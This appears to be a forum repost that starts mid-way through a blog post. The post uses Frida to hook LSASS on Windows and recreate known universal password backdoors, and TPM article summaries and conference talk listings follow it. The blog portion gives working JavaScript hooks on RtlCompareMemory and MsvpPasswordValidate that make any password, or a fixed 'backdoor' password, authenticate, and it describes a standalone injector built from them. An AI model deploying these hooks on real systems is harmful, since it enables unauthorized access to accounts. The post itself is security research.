is also how the code in the previously mentioned blogpost filters candidates to check for the backdoor password. This time round, the output generated by frida-trace was much more readable and I could get a better idea of what was going on. An analysis of the output yielded the following results: When providing the correct, and incorrect password to the runas command, the RtlCompareMemory function is called five times. The first eight characters from the password entered will appear to be padded with a 0x00 byte between each character, most likely due to unicode encoding, making up a 16 byte stream that gets compared with something else (unknown value). The fourth call to RtlCompareMemory appears to compare to the hash from the SAM database which is provided as arg[0]. The password for the test account was password, which has an MD4 hash value of 8846f7eaee8fb117ad06bdd830b7586c. Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing an invalid password of testing123 Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing a valid password of password At this point I figured I should log the function return values as well, just to get an idea of what a success and failure condition looks like. I made two more authentication attempts using runas, one with a valid password and one with an invalid password, observing what the RtlCompareMemory function returns. RtlCompareMemory return values The fourth call to RtlCompareMemory returns the number of bytes that matched in the successful case (which was actually the MD4 comparison), which should be 16 (indicated by the hex 0x10). Considering what we have learnt so far, I naively assumed I could make a “universal backdoor” by simply returning 0x10 for any call to RtlCompareMemory that wanted to compare 16 bytes, originating from within LSASS. This would mean that any password would work, right? I updated the frida-trace handler to simply retval.replace(0x10) indicating that 16 bytes matched in the onLeave method and tested! Authentication failure after aggressively overriding the return value for RtlCompareMemory Instead of successfully authenticating, the number of times RtlCompareMemory got called was reduced to only two invocations (usually it would be five), and the authentication attempt completely failed, even when the correct password was provided. I wasn’t as lucky as I had hoped for. I figured this may be because of the overrides, and I may be breaking other internals where a return for RtlCompareMemory may be used in a negative test. For plan B, I decided to simply recreate the backdoor of the original blogpost. That means, when authenticating with a specific password, only then return that check as successful (in other words, return 0x10 from the RtlCompareMemoryfunction). We learnt in previous tests that the fourth invocation of RtlCompareMemory compares the two buffers of the calculated MD4 of the supplied password and the MD4 from the local SAM database. So, for the backdoor to trigger, we should embed the MD4 of a password we know, and trigger when that is supplied. I used a small python2 one-liner to generate an MD4 of the word backdoor formatted as an array you can use in JavaScript: import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()]) When run in a python2 interpreter, the one-liner should output something like [22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]. This is a byte array that could be used in a Frida script to compare if the supplied password was backdoor, and if so, return 0x10 from the RtlCompareMemory function. This should also prevent the case where blindly returning 0x10 for any 16 byte comparison using RtlCompareMemory breaks other stuff. Up until now we have been using frida-trace and its autogenerated handlers to interact with the RtlCompareMemoryfunction. While this was perfect for us to quickly interact with the target function, a more robust way is preferable in the long term. Ideally, we want to make the sharing of a simple JavaScript snippet easy. To replicate the functionality we have been using up until now, we can use the Frida Interceptor API, providing the address of ntdll!RtlCompareMemory and performing our logic in there as we have in the past using the autogenerated handler. We can find the address of our function using the Module API, calling getExportByName on it. // from: https://github.com/sensepost/frida-windows-playground/blob/master/RtlCompareMemory_backdoor.js const RtlCompareMemory = Module.getExportByName('ntdll.dll', 'RtlCompareMemory'); // generate bytearrays with python: // import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()]) //const newPassword = new Uint8Array([136, 70, 247, 234, 238, 143, 177, 23, 173, 6, 189, 216, 48, 183, 88, 108]); // password const newPassword = new Uint8Array([22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]); // backdoor Interceptor.attach(RtlCompareMemory, { onEnter: function (args) { this.compare = 0; if (args[2] == 0x10) { const attempt = new Uint8Array(ptr(args[1]).readByteArray(16)); this.compare = 1; this.original = attempt; } }, onLeave: function (retval) { if (this.compare == 1) { var match = true; for (var i = 0; i != this.original.byteLength; i++) { if (this.original[i] != newPassword[i]) { match = false; } } if (match) { retval.replace(16); } } } }); The resultant script means that one can authenticate using any local account with the password backdoor when invoking Frida with frida lsass.exe -l .\backdoor.js from an Administrative PowerShell prompt. backdoor – approach #2 Our backdoor approach has a few limitations; the first being that network logons (such as ones initiated using smbclient) don’t appear to work with the backdoor password, the second being that I wanted any password to work, not just backdoor(or whatever you embed in the script). Using the script we have already written, I decided to take a closer look and try and figure out what was calling RtlCompareMemory. I love backtraces, and generating those with Frida is really simple using the backtrace() method on the Thread module. With a backtrace we should be able to see exactly where the a call to RtlCompareMemory came from and extend our investigation a litter further. Backtraces printed for each invocation of RtlCompareMemory I investigated the five backtraces and found two function names that were immediately interesting. The first being MsvValidateTarget and the second being MsvpPasswordValidate. MsvpValidateTarget was being called right after MsvpSamValidate, which may explain why my initial hooking attempts failed as there may be more processing happening there. MsvpPasswordValidate was being called in the fourth invocation of RtlCompareMemory which was the call that compared two MD4 hashes when authenticating interactively as previously discussed. At this stage I Google’d the MsvpPasswordValidate function, only to find out that this method is well known for password backdoors! In fact, it’s the same method used by Inception for authentication bypasses. Awesome, I may be on the right track after all. I couldn’t quickly find a function prototype for MsvpPasswordValidate online, but a quick look in IDA free hinted towards the fact that MsvpPasswordValidate may expect seven arguments. I figured now would be a good time to hook those, and log the return value. MsvpPasswordValidate argument and return value dump Using runas /user:user cmd from a command prompt and providing the correct password for the account, MsvpPasswordValidate would return 0x1, whereas providing an incorrect password would return 0x0. Seems easy enough? I modified the existing hook to simply change the return value of MsvpPasswordValidate to always be 0x1. Doing this, I was able to authenticate using any password for any valid user account, even when using network authentication! Successful authentication, with any password for a valid user account // from: https://github.com/sensepost/frida-windows-playground/blob/master/MsvpPasswordValidate_backdoor.js const MsvpPasswordValidate = Module.getExportByName(null, 'MsvpPasswordValidate'); console.log('MsvpPasswordValidate @ ' + MsvpPasswordValidate); Interceptor.attach(MsvpPasswordValidate, { onLeave: function (retval) { retval.replace(0x1); } }); creating standalone Frida executables The hooks we have built so far depend heavily on the Frida python modules. This is not something you would necessarily have available on an arbitrary Windows target, making the practically of using this rather complicated. We could use something like py2exe, but that comes with its own set of bloat and things to avoid. Instead, we could build a standalone executable that bypasses the need for a python runtime entirely, in C. The main Frida source repository contains some example code for those that want to make use of the lower level bindings here. When choosing to go down this path, you will need decide between two types of C bindings; the one that includes the V8 JavaScript engine (frida-core/frida-gumjs), and one that does not (frida-gum). When using frida-gum, instrumentation needs to be implemented using a C API, skipping the JavaScript engine layer entirely. This has obvious wins when it comes to overall binary size, but increases the implementation complexity a little bit. Using frida-core, we could simply reuse the JavaScript hook we have already written, embedding it in an executable. But, we will be packaging the V8 engine with our executable, which is not great from a size perspective. A complete example of using frida-core is available here, and that is what I used as a template. The only thing I changed was how a target process ID was determined. The original code accepted a process ID as an argument, but I changed that to determine it using frida_device_get_process_by_name_sync, providing lsass.exe as the actual process PID I was interested in. The definition for this function lived in frida-core.h which you can get as part of the frida-core devkit download. Next, I embedded the MsvpPasswordValidate bypass hook and compiled the project using Visual Studio Community 2017. The result? A beefy 44MB executable that would now work regardless of the status of a Python installation. Maybe py2exe wasn’t such a bad idea after all… Passback binary, in all of its 44mb glory, injected into LSASS.exe to allow for local authentication using any password Some work could be done to optimise the overall size of the resultant executable, but this would involve rebuilding the frida-core devkit from source and stripping the pieces we won’t need. An exercise left for the reader, or for me, for another day. If you are interested in building this yourself, have a look at the source code repository for passback here, opening it in Visual Studio 2017 and hitting “build”. summary If you got here, you saw how it was possible to recreate two well-known password backdoors on Windows based computers using Frida. The real world merits of where this may be useful may be small, but I believe the journey getting there is what was important. A Github repository with all of the code samples used in this post is available here. Sursa: https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frida/
-
Windows Insight: The TPM The Windows Insight repository currently hosts three articles on the TPM (Trusted Platform Module): The TPM: Communication Interfaces (Aleksandar Milenkoski? In this work, we discuss how the different components of the Windows 10 operating system deployed in user-land and in kernel-land, use the TPM. We focus on the communication interfaces between Windows 10 and the TPM. In addition, we discuss the construction of TPM usage profiles, that is, information on system entities communicating with the TPM as well as on communication patterns and frequencies; The TPM: Integrity Measurement (Aleksandar Milenkoski? In this work, we discuss the integrity measurement mechanism of Windows 10 and the role that the TPM plays as part of it. This mechanism, among other things, implements the production of measurement data. This involves calculation of hashes of relevant executable files or of code sequences at every system startup. It also involves the storage of these hashes and relevant related data in log files for later analysis; The TPM: Workflow of the Manual and Automatic TPM Provisioning Processes (Aleksandar Milenkoski? In this work, we describe the implementation of the TPM provisioning process in Windows 10. We first define the term TPM provisioning in order to set the scope of this work. Under TPM provisioning, we understand activities storing data in the TPM device, where the stored data is a requirement for the device to be used. This includes: authorization values, the Endorsement Key (EK), and the Storage Root Key (SRK). – Aleksandar Milenkoski Sursa: https://insinuator.net/2019/05/windows-insight-the-tpm/
-
In this talk we will explore how file formats can be abused to target the security of an end user or server, without harming a CPU register or the memory layout with a focus on the OpenDocument file format. At first a short introduction to file formats bug hunting will be given, based on my own approach. This will cover my latest Adobe PDF reader finding and will lead up to my discovery of a remote code execution in Libreoffice. It shows how a simple path traversal issue allowed me to abuse the macro feature to execute a python script installed by libreoffice and abuse it to execute any local program with parameters without any prompt. Additionally other supported scripting languages in Libreoffice as well as other interesting features will be explored and differences to OpenOffice. As software like Imagemagick is using libreoffice for file conversion, potential security issue on the server side will be explained as well. This focuses on certain problems and limitations an attacker has to work with regarding the macro support and other threats like polyglot files or local file path informations. Lastly the potential threats will be summed up to raise awareness regarding any support for file formats and what precausions should be taken. About Alex Inführ Alex Inführ As a Senior Penetration Tester with Cure53, Alex is an expert on browser security and PDF security. His cardinal skillset relates to spotting and abusing ways for uncommon script execution in MSIE, Firefox and Chrome. Alex’s additional research foci revolve around SVG security and Adobe products used in the web context. He has worked with Cure53 for multiple years with a focus on web security, JavaScript sandboxes and file format issues. He presented his research at conferences like Appsec Amsterdam, Appsec Belfast, ItSecX and mulitple OWASP chapters. As part of his research as a co-author for the 'Cure53 Browser Security White Paper', sponsored by Google, he investigated on the security of browser extensions. About Security Fest 2019 May 23rd - 24th 2019 This summer, Gothenburg will become the most secure city in Sweden! We'll have two days filled with great talks by internationally renowned speakers on some of the most cutting edge and interesting topics in IT-security! Our attendees will learn from the best and the brightest, and have a chance to get to know each other during the lunch, dinner, after-party and scheduled breaks. Please note that you have to be at least 18 years old to attend. Highlights of Security Fest Interesting IT-security talks by renowned speakers Lunch and dinner included Great CTF with nice prizes Awesome party! Venue Security Fest is held in Eriksbergshallen in Gothenburg, with an industrial decor from the time it was used as a mechanical workshop. Right next to the venue, you can stay at Quality Hotel 11.
-
Danger of using fully homomorphic encryption - Zhiniang Peng Evolving Attacker Techniques in Cryptocurrency User Targeting - Philip Martin (SAP) Gateway to Heaven - Dmitry Chastuhin & Mathieu Geli Practical Uses for Memory Visualization - Ulf Frisk Modern Secure Boot Attacks - Alex Matrosov Trade War Shellcode Wielding of Imports and Exports - Willi Ballenthin Using Symbolic Execution to Root Routers - Mathy Vanhoef Automated Reverse Engineering of Industrial Control Systems Binaries - Mihalis Maniatakos Lions at the watering hole - Andrei Boz WhatsApp Digger - Deemah, Lamyaa, Malak, Sarah Next-gen IoT botnets - Alex "Jay" Balan Sursa: